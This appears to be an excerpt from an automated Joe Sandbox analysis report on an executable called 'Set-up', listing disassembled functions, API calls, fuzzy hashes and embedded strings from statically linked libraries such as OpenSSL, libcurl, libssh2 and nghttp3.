strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 003C86A0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 003C86BA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 003C86D0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 003C86E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 003C86FC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 003C8712
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 003C872A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 003C8686

Part of subcall function 003ACBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00387254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,003840BB,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003ACBD2

Strings

PKCS #7 SIGNED DATA, xrefs: 003C86CA
DH PARAMETERS, xrefs: 003C8604
check password, OpenSSL error %s, xrefs: 003C88F2
Expecting: , xrefs: 003C8908
PARAMETERS, xrefs: 003C85DC, 003C87FB
X509 CERTIFICATE, xrefs: 003C861A
CERTIFICATE, xrefs: 003C862E, 003C866C
TRUSTED CERTIFICATE, xrefs: 003C8680, 003C869A
crypto/pem/pem_lib.c, xrefs: 003C84F6, 003C8509, 003C851F, 003C8545, 003C855A, 003C8572, 003C88CE, 003C8935, 003C8948, 003C895F, 003C8977, 003C898C, 003C89A5, 003C89CB
CMS, xrefs: 003C86F6, 003C8724
CERTIFICATE REQUEST, xrefs: 003C8656
ANY PRIVATE KEY, xrefs: 003C85C6
PKCS7, xrefs: 003C86B4, 003C86DC, 003C870C
X9.42 DH PARAMETERS, xrefs: 003C85F2
NEW CERTIFICATE REQUEST, xrefs: 003C8644
ENCRYPTED PRIVATE KEY, xrefs: 003C8740
PRIVATE KEY, xrefs: 003C8756, 003C8787

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strcmp$free
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$check password, OpenSSL error %s$crypto/pem/pem_lib.c
API String ID: 3401341699-627933575
Opcode ID: 7bbb8d5ec1719b20f89b9328e467585f99996dd29d249f811a7caf1fc2700dd1
Instruction ID: 3f3ea18ae8ff0841490d9f2ea3a6e89cb04449161d1364977295cf1367482e94
Opcode Fuzzy Hash: 7bbb8d5ec1719b20f89b9328e467585f99996dd29d249f811a7caf1fc2700dd1
Instruction Fuzzy Hash: 62B118B1A4430226D62277205C17FBB7688BF61B5AF08442CFD58F5282FF65DF058762

Function 00242010 Relevance: 51.2, APIs: 11, Strings: 18, Instructions: 414stringnetworkCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0024204A
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00242068
WSAGetLastError.WS2_32 ref: 002420DE
recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0024214D
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00242365
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0024238F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 002423B9
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0024241D
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 002424AD

Strings

Received too short packet, xrefs: 00242169
Malformed ACK packet, rejecting, xrefs: 00242514
tsize, xrefs: 0024248D
got option=(%s) value=(%s), xrefs: 002423E8
requested, xrefs: 0024232C
server requested blksize larger than allocated, xrefs: 00242552
invalid blocksize value in OACK packet, xrefs: 0024251F
%s (%d) %s (%d), xrefs: 00242337
tsize parsed from OACK, xrefs: 002424D3
Internal error: Unexpected packet, xrefs: 002422C4
blksize, xrefs: 002423FC
TFTP error: %s, xrefs: 0024228B
invalid tsize -:%s:- value in OACK packet, xrefs: 00242573
blksize parsed from OACK, xrefs: 00242332
blksize is larger than max supported, xrefs: 0024253C
%s (%d), xrefs: 0024254A
%s (%ld), xrefs: 002424D8, 00242557
blksize is smaller than min supported, xrefs: 00242545

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 3302935713-3407012168
Opcode ID: e8cd79bc7400acc239f44eda997f56eb0b6db12f516171ecd9dd60b8349f2962
Instruction ID: bd2126f9d62f9a5f79c0e923bdfe2801f8f4626f683ca1a9785a125613916cdf
Opcode Fuzzy Hash: e8cd79bc7400acc239f44eda997f56eb0b6db12f516171ecd9dd60b8349f2962
Instruction Fuzzy Hash: 70E124B1A14302EBD718DF25DC41B7ABBE4EB94710F484469FC4897292E774E928CB92

Function 0027A140 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 0027A29A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 0027A2C5
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 0027A2E3

Part of subcall function 0027A5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 0027A5FC

Strings

rblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 0027A512
nghttp3_ksl.c, xrefs: 0027A4CE, 0027A4E3, 0027A4F8, 0027A50D, 0027A522, 0027A537, 0027A54C, 0027A561, 0027A576, 0027A58B
lblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 0027A527
i > 0, xrefs: 0027A4E8, 0027A590
lblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 0027A566
i < blk->n - 1, xrefs: 0027A4FD
node->blk->n == NGHTTP3_KSL_MIN_NBLK, xrefs: 0027A4D3
rblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 0027A551
n > 0, xrefs: 0027A53C, 0027A57B

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy$memmove
String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
API String ID: 1283327689-1606465060
Opcode ID: 4af1a31db6ec170b1d3fab19a9951c52d6579ca2666193b5adb9f6a1c6155a0e
Instruction ID: e8c27a3b15cf275c50e4b5df0f01878a2726f5374dadc5ec41c87ff71c250d3c
Opcode Fuzzy Hash: 4af1a31db6ec170b1d3fab19a9951c52d6579ca2666193b5adb9f6a1c6155a0e
Instruction Fuzzy Hash: 7BC10031624302AFD714CF18CC8596EB7A5FF88310F54C529E95A9B292D770ED94CF82

Function 002C4080 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 190fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00835095), ref: 002C4094
feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 002C40A3
rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 002C40B0
fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,00000000), ref: 002C40D6
feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 002C40F4
rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 002C4101
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 002C410F
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000), ref: 002C413F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 002C414C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 002C4165
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 002C4186
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 002C41A0
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000020,00000000), ref: 002C41BA
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,00000020,00000000), ref: 002C41E4

Strings

Invalid data in public key file, xrefs: 002C4117
Unable to read public key from file, xrefs: 002C41A8
Unable to allocate memory for public key data, xrefs: 002C418E
Missing public key data, xrefs: 002C417E
Unable to open public key file, xrefs: 002C40BA
Invalid key data, not base64 encoded, xrefs: 002C4214
Invalid public key data, xrefs: 002C422E

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: fclose$feoffreadmemchrrewind$fopenisspace
String ID: Invalid data in public key file$Invalid key data, not base64 encoded$Invalid public key data$Missing public key data$Unable to allocate memory for public key data$Unable to open public key file$Unable to read public key from file
API String ID: 752180523-3150497671
Opcode ID: 5b29752a29f6066bfc8e0d585526680a699f7dfe051a66beaef6153186322651
Instruction ID: 06c997877801aedbd356cacf531861b46ff2fe793f110e0c0c9c76cae4a97d94
Opcode Fuzzy Hash: 5b29752a29f6066bfc8e0d585526680a699f7dfe051a66beaef6153186322651
Instruction Fuzzy Hash: E05109B0A143056BD6107A34AC5AF3B3A9CEF91355F08053DFC5ED6283F971E86885B2

Function 002427E0 Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 406stringnetworkCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00242AD7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00242B3D
sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00242D30
WSAGetLastError.WS2_32 ref: 00242D3A

Strings

Internal state machine error, xrefs: 002428C5
tsize, xrefs: 00242BAD
%lld, xrefs: 00242B82
timeout, xrefs: 00242CD3
netascii, xrefs: 00242810, 00242B23
TFTP finished, xrefs: 0024289C
TFTP buffer too small for options, xrefs: 00242C60
Connected for receive, xrefs: 0024290B, 0024298A
blksize, xrefs: 00242C33
tftp.c, xrefs: 00242B03, 00242C6E, 00242D62
0, xrefs: 00242B94
octet, xrefs: 0024280B
tftp_send_first: internal error, xrefs: 0024295C
TFTP filename too long, xrefs: 00242AF5
Connected for transmit, xrefs: 002429E0, 00242A34
%s%c%s%c, xrefs: 00242B2A

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$ErrorLastsendto
String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
API String ID: 3285375004-3063461439
Opcode ID: 041af7e68823e925cd75ade5a7cd392bcbd96e541b1fb9ff74c4c31908bb1cd0
Instruction ID: 5b2e21909bb4d42db98d1b595d4a631aaccf237d78b330d5213b42f2ac4c6d7f
Opcode Fuzzy Hash: 041af7e68823e925cd75ade5a7cd392bcbd96e541b1fb9ff74c4c31908bb1cd0
Instruction Fuzzy Hash: 95E12AB1B10305EFD7189F25CC86F6A7794AF50704F484569FD089B392E775E828C7A2

Function 002BC700 Relevance: 32.0, APIs: 6, Strings: 12, Instructions: 478COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 002BC719
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 002BC7C9
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 002BCB6F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00834218,sftp.c,000006F4), ref: 002BCD6E
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left,sftp.c,000005EE), ref: 002BCD83
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->eof,sftp.c,000005EF), ref: 002BCD98

Strings

sftp.c, xrefs: 002BCD64, 002BCD79, 002BCD8E
heck password, OpenSSL error %s, xrefs: 002BC732, 002BC737
malloc fail for FXP_WRITE, xrefs: 002BCCDB
Response too small, xrefs: 002BCC86
SFTP READ error, xrefs: 002BCCFF
SFTP Protocol badness: unrecognised read request response, xrefs: 002BCCB3
rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left, xrefs: 002BCD7E
Read Packet At Unexpected Offset, xrefs: 002BCCBD
FXP_READ response too big, xrefs: 002BCCCE
gesftp_read() internal error, xrefs: 002BCA72
SFTP Protocol badness, xrefs: 002BCCC7
rc != LIBSSH2_ERROR_EAGAIN || !filep->eof, xrefs: 002BCD93

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert$memcpy$_time64
String ID: FXP_READ response too big$Read Packet At Unexpected Offset$Response too small$SFTP Protocol badness$SFTP Protocol badness: unrecognised read request response$SFTP READ error$gesftp_read() internal error$heck password, OpenSSL error %s$malloc fail for FXP_WRITE$rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left$rc != LIBSSH2_ERROR_EAGAIN || !filep->eof$sftp.c
API String ID: 2498518694-2992553454
Opcode ID: b9f35785391fe8f9edd291b4dd593b5e81c84e332eeaf7d8a7933dba77276b14
Instruction ID: 0eb8a8283b2dbc6706c4b01def095ededb209859633c65390ecf3460cd0b09f1
Opcode Fuzzy Hash: b9f35785391fe8f9edd291b4dd593b5e81c84e332eeaf7d8a7933dba77276b14
Instruction Fuzzy Hash: A902D1719183059FC710DF24DC81B9ABBE4FF88394F244929F89A97352E770E964CB92

Function 001F4720 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 001F4749
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 001F48E5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 001F491B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001F4963
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 001F4971
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001F497B

Part of subcall function 001F06F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,001F5663,?), ref: 001F06F9

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001F4A41
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 001F4A63
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001F4A6D
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 001F4AE0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001F4AEA
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 001F4B28
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001F4B34
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 001F4B76
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001F4B80

Strings

urlapi.c, xrefs: 001F47B9, 001F47CC, 001F47E2, 001F482C, 001F4856, 001F4879, 001F49A6
%u.%u.%u.%u, xrefs: 001F4C00
%ld, xrefs: 001F49BC

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _errno$strtoul$strchr$memchrstrlen
String ID: %ld$%u.%u.%u.%u$urlapi.c
API String ID: 102816355-2423153182
Opcode ID: b30142b13046bf26e6821c457ad53d76523e46be66b37e2385b75801bfff6c9e
Instruction ID: 2d5b7be0a84a635f6b89156269ff34b4c9eb25b382bb65b37efdb318959a2c46
Opcode Fuzzy Hash: b30142b13046bf26e6821c457ad53d76523e46be66b37e2385b75801bfff6c9e
Instruction Fuzzy Hash: 49D147B19083096BE721AB20DC46B7F7BE49F51354F054438FA8A9B382F778DD5487A2

Function 002163E0 Relevance: 31.8, APIs: 8, Strings: 13, Instructions: 330stringCOMMON

Download Yara Rule

APIs

Part of subcall function 002186F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000003), ref: 00218704

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00216460
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00216472
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00216487
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0021649C
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00216654
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00216666
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 0021667B

Strings

/FIND:, xrefs: 00216441
/MATCH:, xrefs: 00216413
/M:, xrefs: 0021642A
lookup word is missing, xrefs: 002164DF, 002166B5
/D:, xrefs: 0021661E
dict.c, xrefs: 00216706, 00216719
/LOOKUP:, xrefs: 00216635
CLIENT libcurl 8.10.1MATCH %s %s %sQUIT, xrefs: 002165B9
/DEFINE:, xrefs: 00216607
Failed sending DICT request, xrefs: 002165D1, 002166F4, 0021678C
default, xrefs: 002164C1, 00216564, 00216697
CLIENT libcurl 8.10.1DEFINE %s %sQUIT, xrefs: 002166E0
CLIENT libcurl 8.10.1%sQUIT, xrefs: 00216778

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strchr$strlen
